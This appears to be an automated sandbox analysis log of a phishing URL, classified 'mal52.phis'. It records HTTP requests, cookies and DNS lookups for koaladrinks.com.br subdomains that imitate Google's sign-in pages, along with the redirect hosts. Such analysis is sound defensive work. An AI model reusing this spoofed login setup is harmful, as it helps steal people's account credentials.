en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=HLvhr5rChkxrlIAoM6e5z-U14wqN5R-Becd0vAtLvZCKhy7vHUAhIaP-czziDvTiVoYTUEcaPKtZLnyBxGSTNzGDnHE5YF0w1ZPphr5B3gnPLNQDvtfi9eFFoGWFh1E0N5vvKCQNrb96KnC0hpkIfRjh4xKdrxmFnwN_nvOMSN8EQXGTVw
Source: global trafficHTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,FCpbqb,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,OTcFib,P6sQOc,PHUIyb,PXsWy,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WhJNk,WpP9Yc,Wt6vjf,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,hhhU8,iAskyc,inNHtf,jGvTv,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;UpnZUd:nnwwYc;Uvc8o:VDovNc;XdiAjb:NLiXbe;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:vfuNJf;lOO0Vd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qafBPd:yDVVkb;qddgKe:xQtZb;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=GLtV1c,JYtL0c,clOb9b HTTP/1.1Host: www3.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=HLvhr5rChkxrlIAoM6e5z-U14wqN5R-Becd0vAtLvZCKhy7vHUAhIaP-czziDvTiVoYTUEcaPKtZLnyBxGSTNzGDnHE5YF0w1ZPphr5B3gnPLNQDvtfi9eFFoGWFh1E0N5vvKCQNrb96KnC0hpkIfRjh4xKdrxmFnwN_nvOMSN8EQXGTVw
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ
Source: global trafficHTTP traffic detected: GET /v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=B4hajb&source-path=%2Fv3%2Fsignin%2Fchallenge%2Fpwd&f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&TL=AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B&_reqid=412469&rt=c HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J; OTZ=7903228_76_76_104100_72_446760; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ
Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.koaladrinks.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ
Source: global trafficHTTP traffic detected: GET /s/a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202 HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"Content-Type: application/jsonsec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J; OTZ=7903228_76_76_104100_72_446760; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: ctrk.klclick3.com
Source: global trafficDNS traffic detected: DNS query: cliks.serviceonesystem.org
Source: global trafficDNS traffic detected: DNS query: serviceonesystem.org
Source: global trafficDNS traffic detected: DNS query: i.koaladrinks.com.br
Source: global trafficDNS traffic detected: DNS query: www.teledataict.com
Source: global trafficDNS traffic detected: DNS query: google.com
Source: global trafficDNS traffic detected: DNS query: ijgbload.koaladrinks.com.br
Source: global trafficDNS traffic detected: DNS query: www3.koaladrinks.com.br
Source: global trafficDNS traffic detected: DNS query: gstatic-fonts.koaladrinks.com.br
Source: global trafficDNS traffic detected: DNS query: yt-sub.koaladrinks.com.br
Source: global trafficDNS traffic detected: DNS query: play.koaladrinks.com.br
Source: global trafficDNS traffic detected: DNS query: wwws.koaladrinks.com.br
Source: unknownHTTP traffic detected: POST /v3/signin/_/AccountsSignInUi/browserinfo?f.sid=-3172993228359564282&bl=boq_identityfrontendauthuiserver_20250105.08_p0&hl=en&_reqid=12469&rt=j HTTP/1.1Host: ijgbload.koaladrinks.com.brConnection: keep-aliveContent-Length: 166sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Same-Domain: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"Content-Type: application/x-www-form-urlencoded;charset=UTF-8sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ijgbload.koaladrinks.com.brSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ijgbload.koaladrinks.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J
Source: chromecache_85.3.drString found in binary or memory: http://www.gnu.org/licenses/gpl-2.0.html
Source: chromecache_94.3.drString found in binary or memory: https://api.w.org/
Source: chromecache_94.3.drString found in binary or memory: https://en-gb.wordpress.org
Source: chromecache_85.3.drString found in binary or memory: https://github.com/WordPress/gutenberg/issues/42319
Source: chromecache_85.3.drString found in binary or memory: https://github.com/WordPress/gutenberg/issues/55190
Source: chromecache_85.3.drString found in binary or memory: https://github.com/WordPress/gutenberg/issues/65934
Source: chromecache_94.3.drString found in binary or memory: https://serviceonesystem.org
Source: chromecache_94.3.drString found in binary or memory: https://serviceonesystem.org/index.php/2025/01/06/hello-world/
Source: chromecache_94.3.drString found in binary or memory: https://serviceonesystem.org/index.php/comments/feed/
Source: chromecache_94.3.drString found in binary or memory: https://serviceonesystem.org/index.php/feed/
Source: chromecache_94.3.drString found in binary or memory: https://serviceonesystem.org/index.php/sample-page/
Source: chromecache_94.3.drString found in binary or memory: https://serviceonesystem.org/index.php/wp-json/
Source: chromecache_94.3.drString found in binary or memory: https://serviceonesystem.org/wp-content/themes/twentytwentyfive/assets/fonts/fira-code/FiraCode-Vari
Source: chromecache_94.3.drString found in binary or memory: https://serviceonesystem.org/wp-content/themes/twentytwentyfive/assets/fonts/manrope/Manrope-Variabl
Source: chromecache_94.3.drString found in binary or memory: https://serviceonesystem.org/wp-content/themes/twentytwentyfive/style.css?ver=1.0
Source: chromecache_94.3.drString found in binary or memory: https://serviceonesystem.org/wp-includes/blocks/navigation/style.min.css?ver=6.7.1
Source: chromecache_94.3.drString found in binary or memory: https://serviceonesystem.org/wp-includes/js/dist/script-modules/block-library/navigation/view.min.js
Source: chromecache_94.3.drString found in binary or memory: https://serviceonesystem.org/wp-includes/js/dist/script-modules/interactivity/index.min.js?ver=06b8f
Source: chromecache_94.3.drString found in binary or memory: https://serviceonesystem.org/xmlrpc.php?rsd
Source: chromecache_85.3.drString found in binary or memory: https://wordpress.org
Source: chromecache_85.3.drString found in binary or memory: https://wordpress.org/themes/twentytwentyfive/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: classification engineClassification label: mal52.phis.win@18/30@42/9
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1904,i,2393401072678527284,7300859850790636309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
